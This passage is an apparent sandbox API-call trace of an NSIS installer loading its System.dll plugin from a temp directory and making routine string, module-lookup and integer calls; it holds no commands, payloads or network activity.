lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.087] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.087] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.087] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.087] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.087] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.088] lstrcpynA (in: lpString1=0x5d0c6c, lpString2="kernel32::CloseHandle(i r10)", iMaxLength=1024 | out: lpString1="kernel32::CloseHandle(i r10)") returned="kernel32::CloseHandle(i r10)" [0030.088] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.088] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.088] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.088] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.088] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.088] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.088] lstrcpyA (in: lpString1=0x5cb908, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0030.088] lstrcpyA (in: lpString1=0x5cbd18, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0030.088] lstrcpyA (in: lpString1=0x5cc118, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0030.088] GetModuleHandleA (lpModuleName="kernel32") returned 0x76bc0000 [0030.088] GetProcAddress (hModule=0x76bc0000, lpProcName="CloseHandle") returned 0x76be5f20 [0030.088] lstrcpynA (in: lpString1=0x5cb908, lpString2="524", iMaxLength=1024 | out: lpString1="524") returned="524" [0030.088] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.088] CloseHandle (hObject=0x20c) returned 1 [0030.088] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="524") returned 3 [0030.107] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.107] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.107] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.107] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.107] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.107] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.107] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.107] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.107] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.107] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.107] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.107] lstrcpynA (in: lpString1=0x5d0c6c, lpString2="59749", iMaxLength=1024 | out: lpString1="59749") returned="59749" [0030.107] lstrcpynA (in: lpString1=0x5d0824, lpString2="+", iMaxLength=1024 | out: lpString1="+") returned="+" [0030.107] lstrcpynA (in: lpString1=0x4226c0, lpString2="32178176", iMaxLength=1024 | out: lpString1="32178176") returned="32178176" [0030.107] lstrlenA (lpString="32178176") returned 8 [0030.107] lstrcpynA (in: lpString1=0x5d21d4, lpString2="32178176", iMaxLength=1024 | out: lpString1="32178176") returned="32178176" [0030.107] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.107] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.107] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.107] lstrcpynA (in: lpString1=0x409400, lpString2="Int64Op", iMaxLength=1024 | out: lpString1="Int64Op") returned="Int64Op" [0030.108] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.108] GetProcAddress (hModule=0x10000000, lpProcName="Int64Op") returned 0x1000180d [0030.108] lstrcpynA (in: lpString1=0x5d03dc, lpString2="32237925", iMaxLength=1024 | out: lpString1="32237925") returned="32237925" [0030.108] lstrcpynA (in: lpString1=0x427000, lpString2="32237925", iMaxLength=1024 | out: lpString1="32237925") returned="32237925" [0030.108] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.108] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.108] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.108] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.108] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.108] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.108] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.108] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.108] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.108] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.108] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.108] lstrcpynA (in: lpString1=0x5d2eac, lpString2="4109", iMaxLength=1024 | out: lpString1="4109") returned="4109" [0030.108] lstrcpynA (in: lpString1=0x5d14fc, lpString2="+", iMaxLength=1024 | out: lpString1="+") returned="+" [0030.108] lstrcpynA (in: lpString1=0x4226c0, lpString2="32178176", iMaxLength=1024 | out: lpString1="32178176") returned="32178176" [0030.108] lstrlenA (lpString="32178176") returned 8 [0030.108] lstrcpynA (in: lpString1=0x5d32f4, lpString2="32178176", iMaxLength=1024 | out: lpString1="32178176") returned="32178176" [0030.109] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.109] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.109] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.109] lstrcpynA (in: lpString1=0x409400, lpString2="Int64Op", iMaxLength=1024 | out: lpString1="Int64Op") returned="Int64Op" [0030.109] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.109] GetProcAddress (hModule=0x10000000, lpProcName="Int64Op") returned 0x1000180d [0030.109] lstrcpynA (in: lpString1=0x5d03dc, lpString2="32182285", iMaxLength=1024 | out: lpString1="32182285") returned="32182285" [0030.109] lstrcpynA (in: lpString1=0x427400, lpString2="32182285", iMaxLength=1024 | out: lpString1="32182285") returned="32182285" [0030.109] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.109] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.109] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.109] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.109] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.109] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.109] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.109] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.109] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.109] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.109] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.109] lstrcpynA (in: lpString1=0x5d32f4, lpString2="*(&t255) p .r5", iMaxLength=1024 | out: lpString1="*(&t255) p .r5") returned="*(&t255) p .r5" [0030.110] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.110] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.110] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.110] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.110] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.110] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.110] lstrcpyA (in: lpString1=0x5cc118, lpString2="" | out: lpString1="") returned="" [0030.110] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.110] lstrcpynA (in: lpString1=0x5ca488, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.110] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.110] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.110] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="5939232") returned 7 [0030.110] lstrcpyA (in: lpString1=0x425400, lpString2="5939232" | out: lpString1="5939232") returned="5939232" [0030.110] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.110] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.110] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.110] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.110] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.110] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.110] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.110] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.110] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.110] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.110] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.111] lstrcpynA (in: lpString1=0x5d03dc, lpString2="user32::wsprintf(p r5, t \x09\x09 '::%d%s' ,\x09 i r12, t '(')", iMaxLength=1024 | out: lpString1="user32::wsprintf(p r5, t \x09\x09 '::%d%s' ,\x09 i r12, t '(')") returned="user32::wsprintf(p r5, t \x09\x09 '::%d%s' ,\x09 i r12, t '(')" [0030.111] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.111] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.111] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.111] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.111] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.111] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.111] lstrcpyA (in: lpString1=0x5cb908, lpString2="user32" | out: lpString1="user32") returned="user32" [0030.111] lstrcpyA (in: lpString1=0x5cbd18, lpString2="user32" | out: lpString1="user32") returned="user32" [0030.111] lstrcpyA (in: lpString1=0x5cc118, lpString2="wsprintf" | out: lpString1="wsprintf") returned="wsprintf" [0030.111] lstrcpynA (in: lpString1=0x5cd1c0, lpString2="::%d%s", iMaxLength=1024 | out: lpString1="::%d%s") returned="::%d%s" [0030.111] lstrcpynA (in: lpString1=0x5cd5c8, lpString2="(", iMaxLength=1024 | out: lpString1="(") returned="(" [0030.111] GetModuleHandleA (lpModuleName="user32") returned 0x74500000 [0030.111] GetProcAddress (hModule=0x74500000, lpProcName="wsprintf") returned 0x0 [0030.111] lstrlenA (lpString="wsprintf") returned 8 [0030.111] GetProcAddress (hModule=0x74500000, lpProcName="wsprintfA") returned 0x7452ea00 [0030.112] lstrcpynA (in: lpString1=0x5cb908, lpString2="5939232", iMaxLength=1024 | out: lpString1="5939232") returned="5939232" [0030.112] lstrcpynA (in: lpString1=0x5cb908, lpString2="::%d%s", iMaxLength=1024 | out: lpString1="::%d%s") returned="::%d%s" [0030.112] lstrcpynA (in: lpString1=0x5cd1c0, lpString2="32237925", iMaxLength=1024 | out: lpString1="32237925") returned="32237925" [0030.112] lstrcpynA (in: lpString1=0x5cd1c0, lpString2="(", iMaxLength=1024 | out: lpString1="(") returned="(" [0030.112] lstrcpynA (in: lpString1=0x5ca488, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.112] wsprintfA (in: param_1=0x5aa020, param_2="::%d%s" | out: param_1="::32237925(") returned 11 [0030.112] lstrcpynA (in: lpString1=0x5ca488, lpString2="(", iMaxLength=1024 | out: lpString1="(") returned="(" [0030.112] wsprintfA (in: param_1=0x5ca488, param_2="%d" | out: param_1="32237925") returned 8 [0030.112] lstrcpynA (in: lpString1=0x5ca488, lpString2="::%d%s", iMaxLength=1024 | out: lpString1="::%d%s") returned="::%d%s" [0030.112] wsprintfA (in: param_1=0x5ca488, param_2="%d" | out: param_1="5939232") returned 7 [0030.112] FreeLibrary (hLibModule=0x5cb908) returned 0 [0030.112] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.112] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.112] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.112] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.112] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.112] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.112] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.112] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.112] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.112] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.112] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 